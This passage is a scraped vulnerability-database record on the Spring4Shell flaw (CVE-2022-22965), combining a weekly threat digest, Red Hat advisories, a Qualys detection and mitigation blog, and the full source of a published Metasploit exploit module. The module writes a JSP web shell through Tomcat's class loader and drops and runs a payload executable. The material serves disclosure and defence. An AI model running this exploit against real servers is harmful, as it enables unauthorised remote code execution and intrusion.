27 16 46 The fourth week of March 2022 witnessed the discovery of 500 vulnerabilities out of which 7 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there were 3 awaiting analysis and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 7 CVEs that require immediate action. Furthermore, we also observed three threat actor groups being highly active in the last week. A financially motivated threat actor called TA551 primarily targeted English, German, Italian, and Japanese speakers through IcedID, an email-based malware. A new variant of the famous PlugX malware called Talisman has been discovered to be used by Chinese state-sponsored threat actor RedFoxtrot. These attacks were staged on telecommunication and defense sectors in South Asian countries to protect the Belt and Road initiative. Deep Panda aka APT 19, a Chinese APT group, exploited the infamous Log4Shell vulnerability in VMware Horizon servers to stage attacks on various sectors across the globe. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. 
Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-22274 https://www.hivepro.com/dos-vulnerability-discovered-in-sonicwall-next-generation-firewall/ CVE-2022-1040 https://www.hivepro.com/sophos-firewall-rce-vulnerability-actively-exploited/ CVE-2022-22965* https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://tanzu.vmware.com/security/cve-2022-22965 CVE-2022-22674* CVE-2022-22675* https://support.apple.com/en-us/HT213220 CVE-2022-26871* https://files.trendmicro.com/jp/ucmodule/apexcentral/win/2019/apexcentral_2019_gm_win_ja_3945_r3.exe https://appweb.trendmicro.com/supportNews/NewsDetail.aspx?id=4395 CVE-2022-0342 https://support.zyxel.eu/hc/en-us/articles/4672704562578-USG-FLEX-ATP-Series-Firmware-Update-5-21-Patch-1-Installation-Notes Active Actors: Icon Name Origin Motive TA551 (Gold Cabin, Shathak) Unknown Financial gain RedFoxtrot (Nomad Panda) China Information theft and espionage APT 19 (Deep Panda, Codoso, Sunshop Group, TG-3551, Bronze Firestone, Pupa) China Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1592: Gather Victim Host Information T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1547: Boot or Logon Autostart Execution T1548: Abuse Elevation Control Mechanism T1140: Deobfuscate/Decode Files or Information T1040: Network Sniffing T1087: Account Discovery T1185: Browser Session Hijacking T1071: Application Layer Protocol T1041: Exfiltration Over C2 Channel T1565: Data Manipulation T1588.003: Code Signing Certificates T1566: Phishing T1059.001: PowerShell T1547.001: Registry Run Keys / Startup Folder T1543: Create 
or Modify System Process T1574: Hijack Execution Flow T1087.002: Domain Account T1005: Data from Local System T1071.001: Web Protocols T1499: Endpoint Denial of Service T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.005: Visual Basic T1574: Hijack Execution Flow T1574: Hijack Execution Flow T1574.002: DLL Side-Loading T1083: File and Directory Discovery T1056: Input Capture T1573: Encrypted Channel T1499.001: OS Exhaustion Flood T1059.003: Windows Command Shell T1574.002: DLL Side-Loading T1574.002: DLL Side-Loading T1036: Masquerading T1135: Network Share Discovery T1113: Screen Capture T1573.002: Asymmetric Cryptography T1203: Exploitation for Client Execution T1053: Scheduled Task/Job T1055: Process Injection T1112: Modify Registry T1040: Network Sniffing T1105: Ingress Tool Transfer T1106: Native API T1053.005: Scheduled Task T1055.004: Asynchronous Procedure Call T1027: Obfuscated Files or Information T1069: Permission Groups Discovery T1095: Non-Application Layer Protocol T1053: Scheduled Task/Job T1053: Scheduled Task/Job T1027.002: Software Packing T1057: Process Discovery T1053.005: Scheduled Task T1053.005: Scheduled Task T1027.003: Steganography T1012: Query Registry T1569: System Services T1055: Process Injection T1082: System Information Discovery T1569.002: Service Execution T1055.004: Asynchronous Procedure Call T1049: System Network Connections Discovery T1204: User Execution T1620: Reflective Code Loading T1204.002: Malicious File T1014: Rootkit T1047: Windows Management Instrumentation T1218: Signed Binary Proxy Execution T1218.007: Msiexec Threat Advisories: Sophos Firewall RCE vulnerability actively exploited DOS Vulnerability discovered in SonicWall Next-Generation Firewall Prolific threat actor TA551 using new malware IcedID New PlugX variant \u201cTalisman\u201d used by famous Chinese APT RCE Spring Framework Zero-Day vulnerability \u201cSpring4Shell\u201d Two Vulnerabilities affecting Apple macOS exploited-in-the-wild 
Actively exploited vulnerability affects Trend Micro Apex Central Authentication Bypass Vulnerability in Zyxel Firmware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T10:11:43", "type": "hivepro", "title": "Weekly Threat Digest: 28 March \u2013 3 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0342", "CVE-2022-1040", "CVE-2022-22274", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-22965", "CVE-2022-26871"], "modified": "2022-04-05T10:11:43", "id": "HIVEPRO:21EBEC4DE35422B57481E3DF94E6EA07", "href": "https://www.hivepro.com/weekly-threat-digest-28-march-3-april-2022/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-10T15:36:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "packetstorm", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "PACKETSTORM:167011", "href": "https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking # It's going to manipulate the Class Loader \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Framework Class property RCE (Spring4Shell)', \n'Description' => %q{ \nSpring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above \nand specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable \nto remote code execution due to an unsafe data binding used to populate an object from request parameters \nto set a Tomcat specific ClassLoader. 
By crafting a request to the application and referencing the \norg.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: \nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can \ngain remote code execution. \n}, \n'Author' => [ \n'vleminator <vleminator[at]gmail.com>' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-22965'], \n['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], \n['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] \n], \n'Platform' => %w[linux win], \n'Payload' => { \n'Space' => 5000, \n'DisableNops' => true \n}, \n'Targets' => [ \n[ \n'Java', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => %w[linux win] \n}, \n], \n[ \n'Linux', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux' \n} \n], \n[ \n'Windows', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win' \n} \n] \n], \n'DisclosureDate' => '2022-03-31', \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Spring4Shell', 'SpringShell'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']), \nOptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), \nOptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), \n] \n) \nregister_advanced_options [ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef jsp_dropper(file, exe) \n# The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. 
\ndropper = <<~EOS \n<%@ page import=\\\"java.io.FileOutputStream\\\" %> \n<%@ page import=\\\"java.util.Base64\\\" %> \n<%@ page import=\\\"java.io.File\\\" %> \n<% \nFileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false); \noFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\")); \noFile.flush(); \noFile.close(); \nFile f = new File(\\\"#{file}\\\"); \nf.setExecutable(true); \nRuntime.getRuntime().exec(\\\"#{file}\\\"); \n%> \nEOS \n \ndropper \nend \n \ndef modify_class_loader(method, opts) \ncl_prefix = 'class.module.classLoader' \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'version' => '1.1', \n'method' => method, \n'headers' => { \n'c1' => '<%', # %{c1}i replacement in payload \n'c2' => '%>' # %{c2}i replacement in payload \n}, \n\"vars_#{method == 'GET' ? 'get' : 'post'}\" => { \n\"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format] \n} \n}) \nend \n \ndef check_log_file \nprint_status(\"#{peer} - Waiting for the server to flush the logfile\") \nprint_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\") \n \nsucceeded = retry_until_true(timeout: 60) do \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(@jsp_file) \n}) \n \nres&.code == 200 && !res.body.blank? 
\nend \n \nfail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded \n \nprint_good(\"#{peer} - Log file flushed\") \nend \n \n# Fix the JSP payload to make it valid once is dropped \n# to the log file \ndef fix(jsp) \noutput = '' \njsp.each_line do |l| \nif l =~ /<%.*%>/ \noutput << l \nelsif l =~ /<%/ \nnext \nelsif l =~ /%>/ \nnext \nelsif l.chomp.empty? \nnext \nelse \noutput << \"<% #{l.chomp} %>\" \nend \nend \noutput \nend \n \ndef create_jsp \njsp = <<~EOS \n<% \nFile jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\"); \njsp.delete(); \n%> \n#{Faker::Internet.uuid} \nEOS \nif target['Arch'] == ARCH_JAVA \njsp << fix(payload.encoded) \nelse \npayload_exe = generate_payload_exe \npayload_filename = rand_text_alphanumeric(rand(4..7)) \n \nif target['Platform'] == 'win' \npayload_path = datastore['WritableDir'] + '\\\\' + payload_filename \nelse \npayload_path = datastore['WritableDir'] + '/' + payload_filename \nend \n \njsp << jsp_dropper(payload_path, payload_exe) \nregister_files_for_cleanup(payload_path) \nend \n \njsp \nend \n \ndef check \n@checkcode = _check \nend \n \ndef _check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) \n) \n \nreturn CheckCode::Unknown('Web server seems unresponsive') unless res \n \nif res.headers.key?('Server') \nres.headers['Server'].match(%r{(.*)/([\\d|.]+)$}) \nelse \nres.body.match(%r{Apache\\s(.*)/([\\d|.]+)}) \nend \n \nserver = Regexp.last_match(1) || nil \nversion = Rex::Version.new(Regexp.last_match(2)) || nil \n \nreturn Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) \n \nvprint_status(\"Detected #{server} #{version} running\") \n \nif datastore['HTTP_METHOD'] == 'Automatic' \n# prefer POST over get to keep the vars out of the query string if possible \nmethods = %w[POST GET] \nelse \nmethods = [ 
datastore['HTTP_METHOD'] ] \nend \n \nmethods.each do |method| \nvars = \"vars_#{method == 'GET' ? 'get' : 'post'}\" \nres = send_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } \n) \n \n# setting the default assertion status to a valid status \nsend_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } \n) \nreturn Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprefix_jsp = rand_text_alphanumeric(rand(3..5)) \ndate_format = rand_text_numeric(rand(1..4)) \n@jsp_file = prefix_jsp + date_format + '.jsp' \nhttp_method = datastore['HTTP_METHOD'] \nif http_method == 'Automatic' \n# if the check was skipped but we need to automatically identify the method, we have to run it here \n@checkcode = check if @checkcode.nil? \nhttp_method = @checkcode.details[:method] \nfail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? 
\n \nprint_good(\"Automatically identified HTTP method: #{http_method}\") \nend \n \n# if the check method ran automatically, add a short delay before continuing with exploitation \nsleep(5) if @checkcode \n \n# Prepare the JSP \nprint_status(\"#{peer} - Generating JSP...\") \n \n# rubocop:disable Style/FormatStringToken \njsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') \n# rubocop:enable Style/FormatStringToken \n \n# Modify the Class Loader \nprint_status(\"#{peer} - Modifying Class Loader...\") \nproperties = { \npayload: jsp, \ndirectory: datastore['PAYLOAD_PATH'], \nprefix: prefix_jsp, \nsuffix: '.jsp', \nfile_date_format: date_format \n} \nres = modify_class_loader(http_method, properties) \nunless res \nfail_with(Failure::TimeoutExpired, \"#{peer} - No answer\") \nend \n \n# No matter what happened, try to 'restore' the Class Loader \nproperties = { \npayload: '', \ndirectory: '', \nprefix: '', \nsuffix: '', \nfile_date_format: '' \n} \n \nmodify_class_loader(http_method, properties) \n \ncheck_log_file \n \nhandler \nend \n \n# Retry the block until it returns a truthy value. Each iteration attempt will \n# be performed with expoential backoff. If the timeout period surpasses, false is returned. \ndef retry_until_true(timeout:) \nstart_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nending_time = start_time + timeout \nretry_count = 0 \nwhile Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time \nresult = yield \nreturn result if result \n \nretry_count += 1 \nremaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nbreak if remaining_time_budget <= 0 \n \ndelay = 2**retry_count \nif delay >= remaining_time_budget \ndelay = remaining_time_budget \nvprint_status(\"Final attempt. 
Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\") \nelse \nvprint_status(\"Sleeping for #{delay} seconds before attempting again\") \nend \n \nsleep delay \nend \n \nfalse \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167011/spring_framework_rce_spring4shell.rb.txt"}], "redhatcve": [{"lastseen": "2022-05-21T01:03:03", "description": "A flaw was found in Spring Framework, specifically within two modules called Spring MVC and Spring WebFlux, (transitively affected from Spring Beans), using parameter data binding. This flaw allows an attacker to pass specially-constructed malicious requests to certain parameters and possibly gain access to normally-restricted functionality within the Java Virtual Machine.\n#### Mitigation\n\nFor those who are not able to upgrade affected Spring classes to the fixed versions, there is a workaround customers can implement for their applications, via setting disallowed fields on the data binder, and denying various iterations of the string "class.*" \n\n\nFor full implementation details, see Spring's early announcement post in the "suggested workarounds" section: <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:57", "type": "redhatcve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-21T00:10:46", "id": "RH:CVE-2022-22965", "href": "https://access.redhat.com/security/cve/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T13:59:49", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. 
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-12T10:02:27", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-04-08T16:57:59", "description": "_This page last updated: April 7th_\n\nA new zero-day Remote Code Execution (RCE) vulnerability, \u201cSpring4Shell\u201d or \u201cSpringShell\u201d was disclosed in the Spring framework. An unauthorized attacker can exploit this vulnerability to remotely execute arbitrary code on the target device. \n\n### What is Spring Framework? \n\nSpring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly. \n\n### Which versions are vulnerable? \n\nThe vulnerability requires JDK version 9 or later to be running. 
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions are vulnerable. It allows remote attackers to plant a web shell when running Spring framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger to allow full remote access. \n\n### How can this be exploited? \n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. This property could enable an attacker to leverage Spring4Shell against a vulnerable application. In fact, the Spring framework class DataBinder warns about this in its [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>): \n\n\u201cNote that there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data, for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases, this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\u201d \n\n### What are the prerequisites to exploit this vulnerability? \n\n * JDK 9 or higher \n * Apache Tomcat as the Servlet container \n * Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) \n * spring-webmvc or spring-webflux dependency \n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions \n\n### Is there a patch available for Spring4Shell? \n\nSpring Framework 5.3.18 and 5.2.20, that contain the fixes, have been released. If you\u2019re able to upgrade to Spring Framework **5.3.18** and **5.2.20**, no workarounds are necessary. 
\n\nIn case you cannot update to the latest Spring Framework version, upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78** provides adequate protection but does not solve the vulnerability completely. \n\nIn addition, there are multiple working proof-of-concept (PoC) exploits available for Spring4Shell. We strongly recommend that organizations deploy these mitigations or use a third-party firewall for defense. \n\n### Qualys Coverage \n\nQualys Research Team has released the following authenticated QIDs to address this vulnerability for now. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.438-3 and in Cloud Agent manifest version LX_MANIFEST-2.5.438.3-2. \n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376506| Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n45525| Spring core or Spring beans jar detected| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n150494| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)| VULNSIGS-2.5.440-3| Web Application Security \n376508| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Authenticated)| VULNSIGS-2.5.440-6/ lx_manifest-2.5.440.6-5| Scanner/Cloud Agent \n730418| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Unauthenticated Check)| VULNSIGS-2.5.440-6| Scanner \n150495 | Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell) | VULNSIGS-2.5.443-3 | Web Application Security \n48209 | Spring Framework and Spring Boot JARs Spring Cloud JARs Detected Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376514 | Spring Framework Remote Code Execution (RCE) Vulnerability (Spring4Shell) Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376520 | Spring Cloud Function Remote Code Execution (RCE) Vulnerability Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | 
Scanner/Cloud Agent \n730416 | Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell) (Unauthenticated Check) | VULNSIGS-2.5.445-3 | Scanner \n \n### Discover Your Attack Surface with up-to-date CyberSecurity Asset Management \n\nAs a first step, Qualys recommends assessing all assets in your environment to map the entire attack surface of your organization. \n\n#### Scoping Potential Attack Surface \n\nQualys Cybersecurity Asset Management (CSAM) continuously inventories all your assets and software. Use CSAM to find assets with Apache Tomcat running on JDK 9 or higher. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) \n\n\n\n#### Finding Vulnerable Spring Components and Versions \n\nQualys CSAM can further help you narrow down the scope by adding Spring Framework to the search criteria, and specifically matching on vulnerable components and versions. This can be used to find assets that have not yet been scanned with VMDR for the Spring4Shell QIDs. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Monitoring Upgrades and Mitigations \n\nUpgrading to Spring Framework 5.3.18+ or 5.2.20+ addresses the root cause and prevents other attack vectors, and it adds protection for other CVEs. Qualys CSAM allows customers to list all Spring Framework versions and verify upgrades. \n\nHowever, some may not be able to upgrade quickly. VMware provided the mitigation alternative to upgrade Apache Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which close the attack vector on Tomcat\u2019s side. Qualys CSAM allows you to check for the presence or absence of these Tomcat updates. 
\n\nQQL for assets with mitigated Tomcat: \n \n \n software:(name:tomcat and update:[`10.0.20`,`9.0.62`,`8.5.78`]) \n\nQQL for assets excluding mitigated Tomcat: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Context Is Critical to Prioritize and Remediate \n\nSecurity teams need to understand the distribution of affected assets from different perspectives, such as internet-exposed, production versus non-production, and which of these assets support business-critical services. Qualys CSAM integrates with additional sources to import asset and business context, which helps customers further understand their impact, prioritize assets based on business criticality, and work with corresponding asset owners and support groups to take remedial actions. \n\nQQL for assets with Tomcat exposed to the internet and visible in Shodan: \n \n \n software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and tags.name:shodan \n\n\n\n### Detect the Vulnerability with Qualys WAS\n\nSecond, protect your public Internet-facing apps, as they are the most exposed to attack and therefore high priority. \n\nThe Qualys WAS Research Team has developed two signatures for detecting vulnerable versions of the Spring Framework. \n\n * QID 150494 (released April 1st) will report vulnerable versions of Spring Cloud Applications (CVE-2022-22963). \n * QID 150495 (released on the 6th) will report vulnerable versions of Spring Core Applications (CVE-2022-22965). \n\nThese QIDs are automatically added to the Core Detection Scope. If you are scanning web applications with the Initial WAS Option Profile then there is no further action necessary. Your scans will automatically test for vulnerable versions of the Spring Framework and report any vulnerable instances found. 
\n\nIf you are using a custom Option Profile for your scans, please ensure you are either using the Core Detection Scope in your Option Profile or adding the above QIDs to any static or dynamic Custom Search Lists. \n\n\n\nThese QIDs collectively use a combination of Out-of-Band and non-Out-of-Band tests for accurate detection. \n\n\n\nThe WAS Research Team is investigating other safe methods for detecting this vulnerability to compensate for potential False Negatives or False Positive cases. In the meantime, it is recommended to use WAS in coordination with other Qualys modules for a more comprehensive methodology for detecting the Spring4Shell vulnerability. \n\nIf your application is vulnerable to Spring4Shell, it is recommended that you immediately follow the steps outlined in the \u201cIs there a patch available for Spring4Shell?\u201d section of this blog. \n\n### Detect Spring4Shell Vulnerability Using Qualys VMDR\n\nNext, it\u2019s time to find Spring4Shell wherever it is hiding in your environment and prioritize your response. \n\nQualys VMDR customers should ensure all their assets are scanned against the above QIDs. As this vulnerability only targets the Spring Framework when deployed with JDK>9 and Tomcat, customers must at least ensure assets with Tomcat and JDK>9 are scanned. The following QQL can be used to find such assets: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) \n\n\n\nOnce assets have been scanned for the above QIDs, customers can use the following QQL to search for the Spring4Shell vulnerability in their environment: \n\nvulnerabilities.vulnerability.qid:376506 \n\n\n\n### Track Spring4Shell Progress with Unified Dashboard\n\nThe Unified Dashboard enables you to track this vulnerability and its impacted hosts, their status, and overall management in real-time. 
To help you quickly find vulnerable hosts and software, a new unified dashboard has been created on the Qualys platform. This dashboard has extremely useful widgets listing all the vulnerable hosts, applications with vulnerable versions of Spring, and most importantly all the vulnerable hosts visible on the Internet. It provides visibility into compliance configurations and software on your \u2018External Attack Surface\u2019 visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>), which are the low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure that have public IP addresses. To use this capability, download and import this Global Dashboard. \n\n[Download and import the \u201cSpring4Shell\u201d Global Dashboard](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)\n\n\n\n### Detect Spring4Shell Vulnerabilities in Running Containers & Images\n\nIf you run Apache Tomcat in containers, then it is critical that you check for 